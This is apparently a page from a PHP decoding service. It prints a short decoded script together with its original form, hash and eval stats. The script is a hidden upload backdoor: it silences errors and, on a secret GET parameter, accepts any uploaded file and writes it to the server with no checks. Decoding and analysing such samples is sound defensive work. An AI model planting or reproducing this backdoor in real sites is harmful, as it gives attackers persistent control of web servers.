Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); if(isset($_GET['FdoaU'])){ echo "<form method='POST' enctype='mu..

Decoded Output download

<?php error_reporting(0); if(isset($_GET['FdoaU'])){ echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /> <input type='submit' value='upload' /></form>"; move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); exit(0); } ?>

Did this file decode correctly?

Original Code

<?php error_reporting(0); if(isset($_GET['FdoaU'])){ echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /> <input type='submit' value='upload' /></form>"; move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); exit(0); } ?>

Function Calls

error_reporting 1

Variables

None

Stats

MD5 b0266f80c0037775c3ae388bd7ce2322
Eval Count 0
Decode Time 92 ms